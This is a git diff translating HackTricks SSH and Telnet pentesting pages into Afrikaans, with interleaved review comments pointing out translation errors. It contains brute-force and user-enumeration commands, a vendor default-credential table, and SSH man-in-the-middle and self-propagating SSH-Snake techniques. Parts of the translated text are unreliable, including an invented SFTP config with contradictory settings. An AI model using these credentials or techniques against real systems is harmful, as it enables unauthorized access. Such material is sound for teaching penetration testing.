Maar jy kan ook **sslcan** of **sslyze** gebruik. +### Nmap skripte ```bash nmap -p22 -sC # Send default nmap scripts for SSH nmap -p22 -sV # Retrieve version -nmap -p22 --script ssh2-enum-algos # Retrieve supported algorythms +nmap -p22 --script ssh2-enum-algos # Retrieve supported algorythms nmap -p22 --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys nmap -p22 --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods ``` - ### Shodan * `ssh` -## Brute force usernames, passwords and private keys +## Brute force gebruikersname, wagwoorde en private sleutels -### Username Enumeration - -In some versions of OpenSSH you can make a timing attack to enumerate users. You can use a metasploit module in order to exploit this: +### Gebruikersnaam Enumerasie +In sommige weergawes van OpenSSH kan jy 'n tydaanval maak om gebruikers te enumereer. Jy kan 'n Metasploit-module gebruik om dit uit te buit: ``` msf> use scanner/ssh/ssh_enumusers ``` - ### [Brute force](../generic-methodologies-and-resources/brute-force.md#ssh) -Some common ssh credentials [here ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)and [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) and below. +Sommige algemene ssh-inloggegewens [hier](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt) en [hier](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) en hieronder. -### Private Key Brute Force - -If you know some ssh private keys that could be used... let's try it. You can use the nmap script: +### Brute Force van Privaatsleutel +As jy van sommige ssh-privaatsleutels weet wat gebruik kan word... laat ons dit probeer. 
Jy kan die nmap-skrips gebruik: ``` https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html ``` - -Or the MSF auxiliary module: - +Of die MSF hulpprogram module: ``` msf> use scanner/ssh/ssh_identify_pubkeys ``` +Of gebruik `ssh-keybrute.py` (native python3, lig en het ouer algoritmes geaktiveer): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). -Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms enabled): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). - -#### Known badkeys can be found here: +#### Bekende slegte sleutels kan hier gevind word: {% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %} -#### Weak SSH keys / Debian predictable PRNG +#### Swak SSH-sleutels / Debian voorspelbare PRNG -Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced. Pre-generated sets of keys generated on Debian systems affected by weak PRNG are available here: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). +Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n drasties verminderde sleutelruimte wat gekraak kan word. Vooraf gegenereerde stelle sleutels wat gegenereer is op Debian-stelsels wat deur swak PRNG geraak is, is hier beskikbaar: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). -You should look here in order to search for valid keys for the victim machine. +Jy moet hier kyk om te soek na geldige sleutels vir die slagoffer se masjien. ### Kerberos -**crackmapexec** using the `ssh` protocol can use the option `--kerberos` to **authenticate via kerberos**.\ -For more info run `crackmapexec ssh --help`. 
+**crackmapexec** wat die `ssh`-protokol gebruik, kan die opsie `--kerberos` gebruik om **teken te gee via Kerberos**.\ +Vir meer inligting, voer `crackmapexec ssh --help` uit. -## Default Credentials +## Standaardlegitimasie -| **Vendor** | **Usernames** | **Passwords** | -| ---------- | ----------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| APC | apc, device | apc | -| Brocade | admin | admin123, password, brocade, fibranne | -| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change\_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme | -| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler | -| D-Link | admin, user | private, admin, user | -| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin | -| EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc | -| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc\_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC\_op, !manage, !admin | -| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 | -| IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer | -| Juniper | netscreen | netscreen | -| NetApp | admin | 
netapp123 | -| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle | -| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default | +| **Vervaardiger** | **Gebruikersname** | **Wagwoorde** | +| ---------------- | ----------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| APC | apc, toestel | apc | +| Brocade | admin | admin123, password, brocade, fibranne | +| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change\_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme | +| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler | +| D-Link | admin, gebruiker | private, admin, gebruiker | +| Dell | root, gebruiker1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin | +| EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc | +| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc\_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC\_op, !manage, !admin | +| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 | +| IBM | USERID, admin, bestuurder, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, stelsel, toestel, ufmcli, klant | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer | +| Juniper | 
netscreen | netscreen | +| NetApp | admin | netapp123 | +| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle | +| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default | ## SSH-MitM -If you are in the local network as the victim which is going to connect to the SSH server using username and password you could try to **perform a MitM attack to steal those credentials:** +As jy in die plaaslike netwerk is as die slagoffer wat gaan koppel aan die SSH-bediener met behulp van gebruikersnaam en wagwoord, kan jy probeer om **'n MitM-aanval uit te voer om daardie legitimasie te steel:** -**Attack path:** +**Aanvalspad:** -* **Traffic Redirection:** The attacker **diverts** the victim's traffic to their machine, effectively **intercepting** the connection attempt to the SSH server. -* **Interception and Logging:** The attacker's machine acts as a **proxy**, **capturing** the user's login details by pretending to be the legitimate SSH server. -* **Command Execution and Relay:** Finally, the attacker's server **logs the user's credentials**, **forwards the commands** to the real SSH server, **executes** them, and **sends the results back** to the user, making the process appear seamless and legitimate. +* **Verkeersomleiding:** Die aanvaller **stuur** die slagoffer se verkeer na hul masjien, en onderskep sodoende die koppelingspoging na die SSH-bediener. +* **Onderskepping en Logging:** Die aanvaller se masjien tree op as 'n **proksi**, en **vang** die gebruiker se aanmeldbesonderhede deur voor te gee as die regmatige SSH-bediener. +* **Opdraguitvoering en Relais:** Uiteindelik **registreer die aanvaller se bediener die gebruiker se legitimasie**, **stuur die opdragte** na die regte SSH-bediener, **voer** dit uit, en **stuur die resultate terug** na die gebruiker, sodat die proses naadloos en regmatig lyk. 
-[**SSH MITM**](https://github.com/jtesta/ssh-mitm) does exactly what is described above. +[**SSH MITM**](https://github.com/jtesta/ssh-mitm) doen presies wat hierbo beskryf word. -In order to capture perform the actual MitM you could use techniques like ARP spoofing, DNS spoofin or others described in the [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/#spoofing). +Om die werklike MitM-ondervinding vas te vang, kan jy tegnieke soos ARP-spoofing, DNS-spoofing of ander wat beskryf word in die [**Spoofing van Netwerk-aanvalle**](../generic-methodologies-and-resources/pentesting-network/#spoofing) gebruik. ## SSH-Snake -If you want to traverse a network using discovered SSH private keys on systems, utilizing each private key on each system for new hosts, then [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) is what you need. +As jy 'n netwerk wil deurloop deur ontdekte SSH-privaatsleutels op stelsels te gebruik, en elke privaatsleutel op elke stelsel te gebruik vir nuwe gasheer, dan is [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) wat jy nodig het. -SSH-Snake performs the following tasks automatically and recursively: +SSH-Snake voer outomaties en herhaaldelik die volgende take uit: -1. On the current system, find any SSH private keys, -2. On the current system, find any hosts or destinations (user@host) that the private keys may be accepted, -3. Attempt to SSH into all of the destinations using all of the private keys discovered, -4. If a destination is successfully connected to, repeats steps #1 - #4 on the connected-to system. +1. Vind enige SSH-privaatsleutels op die huidige stelsel, +2. Vind enige gasheer of bestemmings (gebruiker@gasheer) op die huidige stelsel waar die privaatsleutels aanvaar kan word, +3. Probeer om SSH na al die bestemmings te maak deur al die ontdekte privaatsleutels te gebruik, +4. As 'n bestemming suksesvol gekoppel word, herhaal stappe #1 - #4 op die gekoppelde stelsel. 
-It's completely self-replicating and self-propagating -- and completely fileless. +Dit is heeltemal selfvermeerderend en selfverspreidend - en heeltemal sonder lêers. -## Config Misconfigurations +## Konfigurasie-misconfiguraties -### Root login +### Root-aanmelding -It's common for SSH servers to allow root user login by default, which poses a significant security risk. **Disabling root login** is a critical step in securing the server. Unauthorized access with administrative privileges and brute force attacks can be mitigated by making this change. +Dit is algemeen vir SSH-bedieners om standaard root-gebruikersaanmelding toe te laat, wat 'n beduidende sekuriteitsrisiko inhou. **Deaktivering van root-aanmelding** is 'n kritieke stap in die beveiliging van die bediener. Onbevoegde toegang met administratiewe regte en brute force-aanvalle kan verminder word deur hierdie verandering aan te bring. -**To Disable Root Login in OpenSSH:** +**Om Root-aanmelding in OpenSSH te deaktiveer:** -1. **Edit the SSH config file** with: `sudoedit /etc/ssh/sshd_config` -2. **Change the setting** from `#PermitRootLogin yes` to **`PermitRootLogin no`**. -3. **Reload the configuration** using: `sudo systemctl daemon-reload` -4. **Restart the SSH server** to apply changes: `sudo systemctl restart sshd` +1. **Wysig die SSH-konfigurasie-lêer** met: `sudoedit /etc/ssh/sshd_config` +2. **Verander die instelling** van `#PermitRootLogin yes` na **`PermitRootLogin no`**. +3. **Herlaai die konfigurasie** met: `sudo systemctl daemon-reload` +4. **Herlaai die SSH-bediener** om die veranderinge toe te pas: `sudo systemctl restart sshd` ### SFTP Brute Force * [**SFTP Brute Force**](../generic-methodologies-and-resources/brute-force.md#sftp) -### SFTP command execution +### Uitvoering van SFTP-opdragte -There is a common oversight occurs with SFTP setups, where administrators intend for users to exchange files without enabling remote shell access. 
Despite setting users with non-interactive shells (e.g., `/usr/bin/nologin`) and confining them to a specific directory, a security loophole remains. **Users can circumvent these restrictions** by requesting the execution of a command (like `/bin/bash`) immediately after logging in, before their designated non-interactive shell takes over. This allows for unauthorized command execution, undermining the intended security measures. - -[Example from here](https://community.turgensec.com/ssh-hacking-guide/): +Daar is 'n algemene oorsig met SFTP-opsette waar administrateurs bedoel dat gebruikers lêers kan uitruil sonder om afstandsbeheertoegang in te skakel. Ten spyte van die instelling van gebruikers met nie-interaktiewe skille (bv. `/usr/bin/nologin`) en hulle beperk tot 'n spesifieke gids, bly daar 'n sekuriteitsloophole. **Gebruikers kan hierdie beperkings omseil** deur die uitvoering van 'n opdrag (soos `/bin/bash`) te versoek onmiddellik na aanmelding, voordat hul aangewese nie-interaktiewe skil oorneem. Dit maak ongemagtigde opdraguitvoering moontlik, wat die bedoelde sekuriteitsmaatreëls ondermyn. +[Voorbeeld van hier](https://community.turgensec.com/ssh-hacking-guide/): ```bash ssh -v noraj@192.168.1.94 id ... 
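Review bot: the Default Credentials table in this hunk translates literal credential values: `device` becomes `toestel`, `user`/`user1` become `gebruiker`/`gebruiker1`, and `manager`, `system`, `customer` in the IBM row become `bestuurder`, `stelsel`, `klant`. These are usernames to be tried verbatim, so the rows must keep the English strings; only the header row (Vervaardiger/Gebruikersname/Wagwoorde) should change. Two more problems in the same hunk: under 'Openbare SSH-sleutel van bediener' the patch inserts a made-up `ssh-rsa AAAAB3NzaC1yc2E...Xz6Xz6...` line inside a ```plaintext fence that is never closed (the following ```bash line cannot act as a closing fence, so the `ssh-keyscan -t rsa -p` command renders as plaintext inside the same block); that line is not in the source and should be dropped, and the removed '[See it in action (Asciinema)]' link has no replacement. Smaller translation issues: the root-login procedure renders both 'Reload' and 'Restart' as 'Herlaai', losing the distinction between `systemctl daemon-reload` (step 3) and `systemctl restart sshd` (step 4), so step 4 should read 'Herbegin'; 'teken te gee via Kerberos' does not mean 'authenticate' (use 'om via Kerberos te verifieer'); 'MitM-ondervinding vas te vang' mistranslates 'perform the actual MitM'; and the ssh-audit usage text lost its indentation, so continuation lines such as 'software config (use -p to change port;' no longer sit under `-c, --client-audit`.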
@@ -255,66 +239,74 @@ debug1: Exit status 0 $ ssh noraj@192.168.1.94 /bin/bash ``` +Hier is 'n voorbeeld van 'n veilige SFTP-konfigurasie (`/etc/ssh/sshd_config` - openSSH) vir die gebruiker `noraj`: -Here is an example of secure SFTP configuration (`/etc/ssh/sshd_config` – openSSH) for the user `noraj`: +```plaintext +# SFTP Configuration for noraj +Subsystem sftp internal-sftp +Match User noraj + ChrootDirectory /home/noraj + ForceCommand internal-sftp + AllowTcpForwarding no + X11Forwarding no + PasswordAuthentication yes + PermitTunnel no + PermitTTY no + PermitUserEnvironment no + AllowAgentForwarding no + AllowStreamLocalForwarding no + PermitOpen none + GatewayPorts no + AuthorizedKeysFile /home/noraj/.ssh/authorized_keys +``` + +Hierdie konfigurasie stel die SFTP-diens in vir die gebruiker `noraj` en bevat sekuriteitsmaatreëls soos die beperking van toegang tot slegs die gebruiker se tuisgids (`/home/noraj`), die kragtige gebruik van die interne SFTP-opdrag, die deaktivering van TCP-deurstuur, X11-deurstuur, tunneling, TTY, gebruikersomgewing, agentdeurstuur en plaaslike deurstuur. Dit vereis ook wagwoordverifikasie en gebruik die `authorized_keys`-lêer in die gebruiker se `.ssh`-gids vir sleutelgebaseerde verifikasie. ``` Match User noraj - ChrootDirectory %h - ForceCommand internal-sftp - AllowTcpForwarding no - PermitTunnel no - X11Forwarding no - PermitTTY no +ChrootDirectory %h +ForceCommand internal-sftp +AllowTcpForwarding no +PermitTunnel no +X11Forwarding no +PermitTTY no ``` +Hierdie konfigurasie sal slegs SFTP toelaat: deur skeltoegang te deaktiveer deur die beginopdrag te dwing en TTY-toegang te deaktiveer, maar ook deur alle soorte poortstuur of tonnelering te deaktiveer. -This configuration will allow only SFTP: disabling shell access by forcing the start command and disabling TTY access but also disabling all kind of port forwarding or tunneling. 
- -### SFTP Tunneling - -If you have access to a SFTP server you can also tunnel your traffic through this for example using the common port forwarding: +### SFTP Tonnelering +As jy toegang het tot 'n SFTP-bediener, kan jy ook jou verkeer deur dit tonnel deur byvoorbeeld die algemene poortstuur te gebruik: ```bash sudo ssh -L :: -N -f @ ``` - ### SFTP Symlink -The **sftp** have the command "**symlink**". Therefor, if you have **writable rights** in some folder, you can create **symlinks** of **other folders/files**. As you are probably **trapped** inside a chroot this **won't be specially useful** for you, but, if you can **access** the created **symlink** from a **no-chroot** **service** (for example, if you can access the symlink from the web), you could **open the symlinked files through the web**. - -For example, to create a **symlink** from a new file **"**_**froot**_**" to "**_**/**_**"**: +Die **sftp** het die opdrag "**symlink**". Daarom, as jy **skryfregte** het in 'n sekere vouer, kan jy **symboliese skakels** van **ander vouers/lêers** skep. Aangesien jy waarskynlik **vasgevang** is binne 'n chroot, sal dit nie besonders nuttig wees vir jou nie, maar as jy die geskepte **symboliese skakel** van 'n **nie-chroot-diens** kan **toegang** (byvoorbeeld, as jy die skakel van die web kan bereik), kan jy die geskakelde lêers **deur die web oopmaak**. +Byvoorbeeld, om 'n **symboliese skakel** van 'n nuwe lêer "**_**froot**_**" na "**_**/**_**" te skep: ```bash sftp> symlink / froot ``` +As jy toegang het tot die lêer "_froot_" via die web, sal jy in staat wees om die hoof ("/") gids van die stelsel te lys. -If you can access the file "_froot_" via web, you will be able to list the root ("/") folder of the system. - -### Authentication methods - -On high security environment it’s a common practice to enable only key-based or two factor authentication rather than the simple factor password based authentication. 
But often the stronger authentication methods are enabled without disabling the weaker ones. A frequent case is enabling `publickey` on openSSH configuration and setting it as the default method but not disabling `password`. So by using the verbose mode of the SSH client an attacker can see that a weaker method is enabled: +### Verifikasiemetodes +In 'n hoë sekuriteitsomgewing is dit 'n algemene praktyk om slegs sleutelgebaseerde of tweefaktor-verifikasie in te skakel in plaas van die eenvoudige wagwoordgebaseerde verifikasie. Maar dikwels word die sterker verifikasiemetodes ingeskakel sonder om die swakkeres uit te skakel. 'n Gereelde geval is om `publickey` in die openSSH-konfigurasie in te skakel en dit as die verstekmetode in te stel, maar nie `password` uit te skakel nie. Dus kan 'n aanvaller deur die verbose modus van die SSH-kliënt te gebruik, sien dat 'n swakker metode ingeskakel is: ```bash ssh -v 192.168.1.94 OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019 ... debug1: Authentications that can continue: publickey,password,keyboard-interactive ``` - -For example if an authentication failure limit is set and you never get the chance to reach the password method, you can use the `PreferredAuthentications` option to force to use this method. - +Byvoorbeeld, as 'n outentiseringsmislukkingslimiet ingestel is en jy nooit die kans kry om die wagwoordmetode te bereik nie, kan jy die `PreferredAuthentications`-opsie gebruik om te dwing om hierdie metode te gebruik. ```bash ssh -v 192.168.1.94 -o PreferredAuthentications=password ... debug1: Next authentication method: password ``` +### Konfigurasie lêers -Review the SSH server configuration is necessary to check that only expected\ -methods are authorized. Using the verbose mode on the client can help to see\ -the effectiveness of the configuration. - -### Config files - +Om die SSH-bedienerkonfigurasie te hersien, is dit nodig om te kontroleer dat slegs verwagte metodes geoutoriseer is. 
Die gebruik van die verbose modus op die kliënt kan help om die doeltreffendheid van die konfigurasie te sien. ```bash ssh_config sshd_config 
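Review bot: the new 'veilige SFTP-konfigurasie' block added after the `ssh noraj@192.168.1.94 /bin/bash` example is content that does not exist in the English source, and a translation PR should not introduce it. It also duplicates the original `Match User noraj` block that follows, contradicts its own hardening goal by setting `PasswordAuthentication yes`, and places `PermitUserEnvironment no` inside a `Match` block, which sshd_config(5) does not list among the keywords permitted there, so `sshd -t` should reject the file; drop the added block and its explanatory paragraph and keep only the original block. While at it, restore the indentation the patch strips from `ChrootDirectory %h` and the lines below it (sshd ignores leading whitespace, but the nesting under `Match` is what makes the block readable). Separately, the '### Konfigurasie lêers' heading has been moved above the paragraph 'Om die SSH-bedienerkonfigurasie te hersien...', which in the source belongs to the 'Authentication methods' section; move the heading back below that paragraph so it stays with the `PreferredAuthentications` discussion. Minor wording: 'afstandsbeheertoegang' means remote-control access, not 'remote shell access', and Afrikaans spells 'simboliese skakel' without a y.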
@@ -323,53 +315,50 @@ ssh_known_hosts known_hosts id_rsa ``` - ## Fuzzing * [https://packetstormsecurity.com/files/download/71252/sshfuzz.txt](https://packetstormsecurity.com/files/download/71252/sshfuzz.txt) * [https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh\_version\_2](https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh\_version\_2) -## References +## Verwysings -* You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html) +* Jy kan interessante gidse vind oor hoe om SSH te versterk by [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html) * [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide) -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hacker loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vlot Pools skriftelik en mondeling vereis_). 
{% embed url="https://www.stmcyber.com/careers" %} -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: SSH Port_Number: 22 Protocol_Description: Secure Shell Hardening Entry_1: - Name: Hydra Brute Force - Description: Need Username - Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh - -Entry_2: - Name: consolesless mfs enumeration - Description: SSH enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit' - -``` +Name: Hydra Brute Force +Description: Need Username +Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh +Entry_2: +Name: consolesless mfs enumeration +Description: SSH enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit' + +```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
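Review bot: the 'HackTricks Outomatiese Opdragte' block in this hunk strips the indentation of the `Name:`, `Description:`, `Note:` and `Command:` lines under `Entry_1` and `Entry_2` and drops the blank line between the two entries. This block is structured data consumed by tooling (the `Note:` line itself points at carlospolop/legion), not prose, so it should stay byte-for-byte identical to the source; restore the original indentation and spacing. The rest of the hunk (Fuzzing links, Verwysings, sponsor text) is a straight translation and reads fine.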
diff --git a/network-services-pentesting/pentesting-telnet.md b/network-services-pentesting/pentesting-telnet.md index 3fbd7cbed..4da15a4e8 100644 --- a/network-services-pentesting/pentesting-telnet.md +++ b/network-services-pentesting/pentesting-telnet.md @@ -2,114 +2,316 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwetsbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## **Basic Information** +## **Basiese Inligting** -Telnet is a network protocol that gives users a UNsecure way to access a computer over a network. - -**Default port:** 23 +Telnet is 'n netwerkprotokol wat gebruikers 'n ONbeveiligde manier bied om toegang tot 'n rekenaar oor 'n netwerk te verkry. +**Verstekpoort:** 23 ``` 23/tcp open telnet ``` +### **Banner Gaping** -## **Enumeration** +Banner Gaping is 'n tegniek wat gebruik word om inligting oor 'n bediener of diens te bekom deur die banner te ondersoek wat deur die bediener gestuur word wanneer 'n verbindig daarmee gemaak word. Hierdie banner bevat dikwels nuttige inligting soos die bediener se weergawe, die gebruikte sagteware, en selfs moontlike kwesbaarhede. -### **Banner Grabbing** +Om banner gaping uit te voer, kan jy 'n telnet-kliënt gebruik om 'n verbindig met die bediener te maak en die banner te ondersoek wat deur die bediener teruggestuur word. Hier is 'n voorbeeld van hoe om dit te doen: +```bash +telnet +``` + +Vervang `` met die IP-adres van die teikenbediener en `` met die poortnommer waarop die diens loop. As jy suksesvol verbind, sal jy die banner sien wat deur die bediener teruggestuur word. 
+ +Dit is belangrik om te onthou dat sommige bedieners die bannerinligting kan verberg of vervals om te voorkom dat dit deur aanvallers gebruik word. Daarom is dit noodsaaklik om ander tegnieke vir inligtingversameling te gebruik om 'n vollediger prentjie van die teikenbediener te kry. ```bash nc -vn 23 ``` - -All the interesting enumeration can be performed by **nmap**: - +Alle interessante opsporing kan uitgevoer word deur **nmap**: ```bash nmap -n -sV -Pn --script "*telnet* and safe" -p 23 ``` +Die skrip `telnet-ntlm-info.nse` sal NTLM-inligting (Windows-weergawes) verkry. -The script `telnet-ntlm-info.nse` will obtain NTLM info (Windows versions). +Volgens die [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In die TELNET-protokol is daar verskeie "**opsies**" wat toegelaat sal word en gebruik kan word met die "**DO, DON'T, WILL, WON'T**" struktuur om 'n gebruiker en bediener in staat te stel om ooreen te kom om 'n meer ingewikkelde (of dalk net 'n ander) stel konvensies vir hul TELNET-verbinding te gebruik. Sulke opsies kan die karakterstel, die echo-modus, ens. insluit. -From the [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In the TELNET Protocol are various "**options**" that will be sanctioned and may be used with the "**DO, DON'T, WILL, WON'T**" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc. 
